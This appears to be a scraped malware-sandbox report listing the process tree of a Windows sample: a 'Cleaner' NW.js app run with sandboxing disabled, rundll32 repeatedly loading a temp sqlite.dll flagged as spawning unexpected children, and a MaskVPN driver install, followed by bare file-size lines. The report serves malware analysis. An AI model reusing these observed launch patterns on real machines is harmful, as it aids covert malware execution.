C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=1716 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2460 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2380 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=2088 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3180 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=1936 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=3592 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=1832 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=2016 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,5458917286362979523,13208364140039155422,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8528_1050516471" --mojo-platform-channel-handle=3604 /prefetch:85⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D6C1.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\507F.exeC:\Users\Admin\AppData\Local\Temp\507F.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{64fa3a1e-3f7d-3245-8554-ad7bafaa7f4d}\oemvista.inf" "9" "4d14a44ff" "0000000000000124" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
696KB
-
Filesize
4KB
-
Filesize
40.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
31.7MB
-
Filesize
192KB
-
Filesize
88KB
-
Filesize
80KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
1.2MB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
8KB
-
Filesize
41.1MB
-
Filesize
628KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
72KB
-
Filesize
1.3MB
-
Filesize
9.1MB
-
Filesize
35.9MB
-
Filesize
188KB
-
Filesize
31.7MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
31.7MB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
12KB
-
Filesize
828KB
-
Filesize
444KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
6.0MB
-
Filesize
120KB
-
Filesize
5.0MB
-
Filesize
120KB
-
Filesize
6.0MB